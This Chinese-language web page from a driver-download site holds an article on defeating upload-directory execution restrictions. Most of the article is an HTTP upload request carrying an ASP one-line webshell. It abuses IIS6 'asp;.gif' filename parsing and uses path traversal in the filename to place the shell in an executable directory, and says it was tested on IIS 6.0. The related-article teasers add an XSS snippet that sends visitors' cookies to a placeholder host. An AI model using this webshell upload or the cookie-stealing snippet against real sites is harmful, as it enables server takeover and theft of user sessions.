驱动管家:安全、高效、精准的专业驱动下载站!

上传目录却取消了脚本执行的权限怎么办?

2018-03-02 18:21:45责编:llp   来源:驱动管家     人气:

然而。上传目录取消了脚本执行的权限。 我想这里估计大家都要放弃了。

上传目录却取消了脚本执行的权限怎么办?

如何突破呢?其实是可以的. 关键是 [不修改名字]

先来看看一个上传的数据包:

POST /fa-bu/upload/upfile1.asp HTTP/1.1

Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*

Referer: http://xxxxx/fa-bu/upload/upload.asp

Accept-Language: zh-cn

Content-Type: multipart/form-data; boundary=---------------------------7da290150c5e

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

Host: xxx.xxxx.xxnet

Content-Length: 448

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: ASPSESSIONIDSSCTCSCT=DJBKGKLBBIGNKJMBGOENNPAN

-----------------------------7da290150c5e

Content-Disposition: form-data; name="act"

upload

-----------------------------7da290150c5e

Content-Disposition: form-data; name="file1"; filename="E:\xxx\xxx\xx\111.asp;.gif"

Content-Type: text/plain

<%execute(request("cmd"))%>

-----------------------------7da290150c5e

Content-Disposition: form-data; name="Submit"

up

-----------------------------7da290150c5e--

关键是 :

Content-Disposition: form-data; name="file1"; filename="E:\xxx\xxx\xx\111.asp;.gif"

我首先呢。 filename他是如何判断 那个开始就是文件名呢? 他是判断filename里的最右边的一个"\"以后的就是文件名字了。

大家因该知道。 在windows下 "\" 和 "/" 是不分家的。

假设上传之后的目录为upload/

然后一个可以执行可以写的目录为 okokok/

那么我们只要构造

Content-Disposition: form-data; name="file1"; filename="E:\xxx\xxx\xx\./../okokok/111.asp;.gif"

那么我们上传的文件就成功的传进去了 okokok/111.asp;.gif了。

突破之!

PS: win+iis6.0测试成功。

  • 黑客攻击oracle系统有哪些方法?可以使用入侵检测工具检测oracle系统

    黑客攻击oracle系统有哪些方法?可以使用入侵检测工具检测oracle系统

    Oracle的销售在向客户兜售其数据库系统一直把它吹捧为牢不可破的,耍嘴皮子容易,兑现起来可就不那么容易了。不管什么计算机系统,人们总能够找到攻击它的方法,Oracle也不例外。本文将和大家从黑客的角度讨论黑

    详情2018-02-04 09:35:04责编:llp   来源:驱动管家     
  • 动易4.03漏洞在哪里?动易4.03漏洞的原理

    动易4.03漏洞在哪里?动易4.03漏洞的原理

    动易4 03上传漏洞。2005-1-10 就出来了,一直没有公布。看黑客防线的攻关第3关用的是动易所有公布出来了。影响版本: 动易4 03上面的是动易的上传代码,从上面分析,我们可以看到,它明显存在着上传漏洞。重要的

    详情2018-02-26 17:05:57责编:llp   来源:驱动管家     
  • 什么是网络爬虫?网络爬虫不安全体现在哪些方面?

    什么是网络爬虫?网络爬虫不安全体现在哪些方面?

    网络爬虫概述网络爬虫(Web Crawler),又称网络蜘蛛(Web Spider)或网络机器人(Web Robot),是一种按照一定的规则自动抓取万维网资源的程序或者脚本,已被广泛应用于互联网领域。搜索引擎使用网络爬虫抓取Web网

    详情2018-01-14 16:58:40责编:llp   来源:驱动管家     
  • voip渗透现状 怎么保护voip基础设施?

    voip渗透现状 怎么保护voip基础设施?

    黑客通过VoIP渗透来窃取、私用企业的VoIP电话,造成了VoIP的不安全性。开放性的架构所带来的灵活性让VoIP能够渗透到企业的整个管理流程中去,提高通信效能,提高生产效率,这是IP技术的核心优势所在。所有影响数据网

    详情2018-02-09 18:51:31责编:llp   来源:驱动管家     
  • 网警演讲以ddos为题 讲述一些奇葩ddos案件

    网警演讲以ddos为题 讲述一些奇葩ddos案件

    江苏省公安厅网安总队科长童瀛在乌云 2015 白帽子大会上以 DDoS 为题演讲新型网络犯罪、新的应用方法层出不穷,「当网警这 5 年,太挑战了」。于是网警叔叔回忆起了这些年经历过的奇葩 DDoS 攻击案例,哭

    详情2018-02-05 10:00:44责编:llp   来源:驱动管家     
  • dns如何查找域名?dns是怎么如何运行的?

    dns如何查找域名?dns是怎么如何运行的?

    有一定技术基础的互联网用户都知道DNS是做什么用的,但大多数人都不清楚DNS如何查找域名。 Ven发现了一幅图片,这幅图片非常形象地描述了DNS查找下的连锁反应,对不了解DNS运行的人们可能会有些帮助。下面这张图

    详情2018-02-06 09:37:16责编:llp   来源:驱动管家     
  • 校内网漏洞 校内网存在xss漏洞

    校内网漏洞 校内网存在xss漏洞

    校内网在发blog时对插入图片过滤不严格,存在xss漏洞 在发blog时将插入图片URL写为如下代码即可触发:普通浏览复制代码打印代码javascript:window location href=& 39;http: www xxx com test php?cookie=& 39;

    详情2018-01-26 16:25:17责编:llp   来源:驱动管家     
  • 谈谈csrf的攻击原理 什么是csrf?

    谈谈csrf的攻击原理 什么是csrf?

    CSRF攻击原理解析Author: rayh4c [80sec]EMail: rayh4c 80sec comSite: http: www 80sec comDate: 2008-9-210×00 前言在Web程序中普通用户一般只在Web界面里完成他想要的操作,Web程序接受的正常客户端请

    详情2018-01-18 13:30:58责编:llp   来源:驱动管家     
  • 怎么找出qq邮箱的xss漏洞?qq邮箱xss跨站漏洞如何修复?

    怎么找出qq邮箱的xss漏洞?qq邮箱xss跨站漏洞如何修复?

    QQ邮箱储存型xss,无任何过滤哦亲 邮箱打开附件处文本型附件可以直接打开,对文本字符无任何过滤。在所有ie内核的浏览器下面触发文本内的xss通过以下步骤可在现漏洞首先建个记事本输入保存。然后打开QQ邮箱点击

    详情2018-02-05 20:53:45责编:llp   来源:驱动管家     
  • u盘启动盘制作工具有风险 盗版软件多且可能带病毒

    u盘启动盘制作工具有风险 盗版软件多且可能带病毒

    一、概述1 盗版软件用户和“APT攻击”我国电脑用户当中,使用盗版软件是非常普遍的现象,从盗版的Windows系统到各种收费软件的“破解版”等等。互联网上也充斥着各种帮助用户使用盗版的“激活工具”、“破解工具

    详情2018-01-18 14:39:47责编:llp   来源:驱动管家